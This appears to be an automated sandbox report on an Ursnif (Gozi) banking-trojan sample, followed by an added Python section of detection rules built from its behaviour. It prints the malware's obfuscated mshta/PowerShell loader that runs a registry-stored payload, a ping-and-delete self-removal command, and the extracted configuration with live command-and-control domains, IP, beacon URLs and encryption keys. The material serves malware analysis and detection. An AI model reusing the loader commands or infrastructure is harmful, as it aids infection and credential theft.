Windows Analysis Report lia.exe

Overview

General Information

Sample Name: lia.exe
Analysis ID: 551720
MD5: 8b893e03dd1c7ce96df57f92f302dcb1
SHA1: a7a131ea9f39ebaa195296ebd9b44708bee8264d
SHA256: dd023f1f2ce682e9db588aa6cb859b6279d5e43f87a9a99da3cd683711736324
Tags: exe, gozi

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Modifies the import address table of user mode modules (user mode IAT hooks)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Process Tree

  • System is w10x64
  • lia.exe (PID: 7036 cmdline: "C:\Users\user\Desktop\lia.exe" MD5: 8B893E03DD1C7CE96DF57F92F302DCB1)
    • control.exe (PID: 6004 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6168 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lia.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 6428 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 3092 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 6404 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6AF4.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 1080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 5868 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • RuntimeBroker.exe (PID: 4252 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 5772 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\6AF4.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 3312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • RuntimeBroker.exe (PID: 4572 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • RuntimeBroker.exe (PID: 5160 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 5652 cmdline: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 5360 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 988 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jyrg='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jyrg).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 7160 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7136 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES533B.tmp" "c:\Users\user\AppData\Local\Temp\vjag4cgm\CSC876E17C1D4FA4A478F85FCB91E435E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6256 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5772 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES771E.tmp" "c:\Users\user\AppData\Local\Temp\wvnfnueh\CSCD2B2FCBE1BFD4A96A519A01DF502239.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • backgroundTaskHost.exe (PID: 6256 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca MD5: B7FC4A29431D4F795BBAB1FB182B759A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "qIukMm1AgKEd3dDbi+35d6MWl+UVbpPFMmGiIDJDDgacZEK8jS4/5zs7ubFZ5RKJ14yC3bMOc4/MB7Zet4BsfAXbGBTmAWZXgT7koTnek2QEZiZ20WKgDLTyQy6GTUUxk0Lxr770IDyy/BSk6aJtHlPex8y6K+Zfruo7cnUzrkN8zs1jBevHKQWt6llI/Itko98RJ0R0pmGGdCg3N/wJUyo7XGnNMik7BdDxE//CSyU7CGkS06hh8BE+0pne+Py1DXhCspMJHsvHS9ciS0vyjWH7bqpi3HvZcztPPJEdLRwiwxTsC/ZMMvLH6gW4XsTGYqrbBj5INNDf6kLJCXP5iGV+GsvodMKbUJybGxVS5nY=", "c2_domain": ["apr.intooltak.com", "app.querosityproject.com"], "botnet": "1000", "server": "770", "serpent_key": "BwM3bYGWLcupJ1hC", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
(5 of 71 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.3.lia.exe.3008f40.2.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
1.3.lia.exe.2f5a4a0.0.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
1.3.lia.exe.2f5a4a0.0.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
1.3.lia.exe.2fd94a0.1.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jyrg='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jyrg).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 988, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ProcessId: 6652
Sigma detected: Mshta Spawning Windows Shell
Source: Process started | Author: Florian Roth | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jyrg='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jyrg).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 988, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ProcessId: 6652
Sigma detected: Suspicious Rundll32 Activity
Source: Process started | Author: juju4, Jonhnathan Ribeiro, oscd.community | Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6004, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 5360
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6652, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline, ProcessId: 7160
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jyrg='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jyrg).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 988, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)), ProcessId: 6652
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132864962767392163.6652.DefaultAppDomain.powershell
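The process tree and the Sigma hits above describe one chain: mshta.exe eval()s a script read back from a GUID-named key under HKCU\Software\AppDataLow\Software\Microsoft, that script starts PowerShell with gp (Get-ItemProperty) and iex (Invoke-Expression) hidden behind freshly created random aliases, PowerShell compiles C# out of the user's Temp folder, and the injected explorer.exe runs the "ping localhost -n 5 && del" self-deletion and the myip.opendns.com lookup. The Python below is an added example, not Joe Sandbox output, that turns those behaviours into hunting rules over process-creation events. The sample events are constructed from the command lines in this report (PIDs and paths as listed); the rule names are this example's own, not Sigma rule titles.

```python
# Added example: hunting rules over process-creation events, derived from the
# process tree and Sigma hits in this report. Not Joe Sandbox code.
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str = ""


def _base(path: str) -> str:
    """File name of an image path, lower-cased (handles both slash styles)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _has(e: ProcEvent, *needles: str) -> bool:
    low = e.cmdline.lower()
    return all(n in low for n in needles)


RULES = [
    # mshta.exe launching a shell (the two "Mshta Spawning Windows Shell" hits)
    ("mshta_spawns_shell", lambda e: _base(e.parent_image) == "mshta.exe"
        and _base(e.image) in {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}),
    # inline HTA whose script eval()s a payload read out of the registry
    ("mshta_inline_hta_regread", lambda e: _base(e.image) == "mshta.exe"
        and _has(e, "about:<hta:application>", "regread(")),
    # PowerShell aliasing iex to a random name and running a registry value
    ("powershell_iex_from_registry", lambda e: _base(e.image) == "powershell.exe"
        and re.search(r"-value\s+iex\b", e.cmdline, re.I) is not None
        and "hkcu:" in e.cmdline.lower()),
    # csc.exe compiling sources that live in the user's Temp folder
    ("csc_from_user_temp", lambda e: _base(e.image) == "csc.exe"
        and re.search(r"\\users\\[^\\]+\\appdata\\local\\temp\\", e.cmdline, re.I) is not None),
    # ping used as a sleep, followed by deletion of the dropper
    ("ping_sleep_self_delete", lambda e: _base(e.image) == "cmd.exe"
        and re.search(r"ping\s+\S+\s+-n\s+\d+\s*&&\s*del\b", e.cmdline, re.I) is not None),
    # external IP discovery through OpenDNS
    ("external_ip_via_nslookup", lambda e: _base(e.image) == "nslookup.exe"
        and "myip.opendns.com" in e.cmdline.lower()),
    # control.exe -> rundll32 Shell32.dll,Control_RunDLL (the Rundll32 Sigma hit)
    ("rundll32_control_rundll", lambda e: _base(e.image) == "rundll32.exe"
        and _base(e.parent_image) == "control.exe"
        and "control_rundll" in e.cmdline.lower()),
]


def evaluate(events):
    """Return (rule_name, pid) for every rule each event triggers."""
    return [(name, e.pid) for e in events for name, pred in RULES if pred(e)]


# Constructed from the report's process tree (paths and PIDs as listed there).
SAMPLE_EVENTS = [
    ProcEvent(3440, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE",
              r"C:\Windows\system32\control.exe"),
    ProcEvent(6168, r"C:\Windows\System32\cmd.exe",
              r'C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lia.exe',
              r"C:\Windows\Explorer.EXE"),
    ProcEvent(5868, r"C:\Windows\System32\nslookup.exe",
              "nslookup myip.opendns.com resolver1.opendns.com", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(5360, r"C:\Windows\system32\rundll32.exe",
              r'"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h',
              r"C:\Windows\system32\control.exe"),
    ProcEvent(988, r"C:\Windows\System32\mshta.exe",
              r'''C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jyrg='wscript.shell';resizeTo(0,2);'''
              r'''eval(new ActiveXObject(Jyrg).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft'''
              r'''\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'''),
    ProcEvent(6652, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; '''
              r'''new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl '''
              r'''"HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))''',
              r"C:\Windows\System32\mshta.exe"),
    ProcEvent(7160, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline',
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
]

if __name__ == "__main__":
    for name, pid in evaluate(SAMPLE_EVENTS):
        print(f"{name:30s} pid={pid}")
```

The alias trick matters for the PowerShell rule: the command line never contains "Invoke-Expression", only "-value iex", so a rule keyed on the cmdlet name would miss it. The explorer.exe event triggers nothing on its own; the suspicious activity only becomes visible in its children, which is why the parent image is part of several rules.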

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://apr.intooltak.com/GUlBnqEqcwtrn48_2/BE1EqzAvLejt/cb_2BaCRrwf/fWZBg8h5a62TXa/ZijwGrOQXflAgqbaDl7vf/RWmm1wdfmEqQ53O8/wCfIuBFFTvny4Ty/wNnD_2FEBKrFWj66al/3Xji0up_2/BgYV45jLknd5oCK8kb3h/IMSPqceHWV7drpxnmfQ/DvisvgmR_2F11ZikfA2avm/yQQyOWRIC9HrG/_2Fskrj5/9o_2BraWvUUtS0KRGaPskJs/8YiMjMPZvb/QZXl3C1FFIFMxJSHp/vq0A22YW_2B0/ynWnVX3jCla/hCIZQggWpcdryd/2P_2FL1_2BMBiXUGiQteI/jG_2BPlE/MfOjEqY7X/Fc | Avira URL Cloud: Label: malware
Source: http://apr.intooltak.com/Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/I | Avira URL Cloud: Label: malware
Found malware configuration
Source: lia.exe | Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "qIukMm1AgKEd3dDbi+35d6MWl+UVbpPFMmGiIDJDDgacZEK8jS4/5zs7ubFZ5RKJ14yC3bMOc4/MB7Zet4BsfAXbGBTmAWZXgT7koTnek2QEZiZ20WKgDLTyQy6GTUUxk0Lxr770IDyy/BSk6aJtHlPex8y6K+Zfruo7cnUzrkN8zs1jBevHKQWt6llI/Itko98RJ0R0pmGGdCg3N/wJUyo7XGnNMik7BdDxE//CSyU7CGkS06hh8BE+0pne+Py1DXhCspMJHsvHS9ciS0vyjWH7bqpi3HvZcztPPJEdLRwiwxTsC/ZMMvLH6gW4XsTGYqrbBj5INNDf6kLJCXP5iGV+GsvodMKbUJybGxVS5nY=", "c2_domain": ["apr.intooltak.com", "app.querosityproject.com"], "botnet": "1000", "server": "770", "serpent_key": "BwM3bYGWLcupJ1hC", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Multi AV Scanner detection for submitted file
Source: lia.exe | Virustotal: Detection: 64%
Source: lia.exe | ReversingLabs: Detection: 74%
Antivirus / Scanner detection for submitted sample
Source: lia.exe | Avira: detected
Machine Learning detection for sample
Source: lia.exe | Joe Sandbox ML: detected
Source: 1.2.lia.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.lia.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_00B17479 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,1_2_00B17479
Source: lia.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Binary string: ntdll.pdb source: lia.exe, 00000001.00000003.467580599.0000000003FD0000.00000004.00000001.sdmp, lia.exe, 00000001.00000003.476010492.0000000004080000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: lia.exe, 00000001.00000003.467580599.0000000003FD0000.00000004.00000001.sdmp, lia.exe, 00000001.00000003.476010492.0000000004080000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.pdb source: powershell.exe, 0000000C.00000002.614202751.000001770375D000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039E8409 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,1_2_039E8409
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039F2ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,1_2_039F2ECF
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039EB9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,1_2_039EB9D4
Source: C:\Users\user\Desktop\lia.exe | Code function: 1_2_039DE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,1_2_039DE91D
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036BE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,44_2_036BE91D
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036CB9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,44_2_036CB9D4
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 44_2_036D2ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,44_2_036D2ECF

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49768 -> 185.189.12.123:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49769 -> 185.189.12.123:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49769 -> 185.189.12.123:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49772 -> 185.189.12.123:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49772 -> 185.189.12.123:80
